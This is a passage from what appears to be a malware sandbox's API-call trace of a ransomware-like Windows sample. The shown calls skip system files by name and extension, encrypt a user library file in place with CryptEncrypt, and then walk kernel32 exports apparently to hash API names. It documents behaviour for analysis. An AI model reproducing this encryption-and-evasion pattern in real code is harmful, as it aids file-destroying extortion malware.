(lpString1="Music.library-ms", lpString2="bootsect.bak") returned 1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="ntuser.dat.log") returned -1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="thumbs.db") returned -1 [0079.793] lstrcmpiW (lpString1="Music.library-ms", lpString2="Bootfont.bin") returned 1 [0079.793] lstrlenW (lpString="Music.library-ms") returned 16 [0079.793] lstrcmpiW (lpString1="library-ms", lpString2="lnk") returned -1 [0079.793] lstrcmpiW (lpString1="library-ms", lpString2="exe") returned 1 [0079.793] lstrcmpiW (lpString1="library-ms", lpString2="sys") returned -1 [0079.793] lstrcmpiW (lpString1="library-ms", lpString2="dll") returned 1 [0079.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.793] lstrlenW (lpString="Music.library-ms") returned 16 [0079.793] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.793] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Music.library-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" [0079.794] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0079.794] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3584) returned 1 [0079.794] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0079.794] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.794] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.794] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.794] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.795] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0079.795] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.795] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.795] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.796] CloseHandle (hObject=0x45c) returned 1 [0079.796] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.796] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0079.797] CloseHandle (hObject=0x0) returned 0 [0079.797] CloseHandle (hObject=0x458) returned 1 [0079.798] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.798] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.798] GetTickCount () returned 0x114c707 [0079.798] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.799] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.799] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.799] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.799] lstrlenA (lpString="kernel32.dll") returned 12 [0079.799] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.799] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.799] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.799] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.799] lstrlenA (lpString="ADDATOMA") returned 8 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.799] lstrlenA (lpString="ADDATOMW") returned 8 [0079.799] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.800] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.800] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.800] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.800] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.800] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.800] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.800] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.800] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.800] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.800] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.800] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.800] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.800] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.800] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.800] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.800] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.800] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.800] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.800] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.801] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.801] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.801] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.801] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.801] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.801] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.801] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.801] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.801] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.801] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.801] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.801] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.801] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.801] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.801] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.801] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.801] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.801] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.801] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.802] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.802] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.802] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.802] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.802] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.802] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.802] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.802] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.802] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.802] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.802] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.802] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.802] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.802] lstrlenA (lpString="BEEP") returned 4 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.802] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.802] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.802] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.802] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.802] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.803] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.803] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.803] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.803] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.803] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.803] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.803] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.803] lstrlenA (lpString="CANCELIO") returned 8 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.803] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.803] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.803] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.803] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.803] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.803] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.803] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.803] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.803] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.803] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.803] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.803] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.804] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.804] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.804] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.804] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.804] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.804] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.804] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.804] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.804] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.804] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.804] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.804] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.804] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.805] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.805] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.805] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.805] lstrcpyA (in: 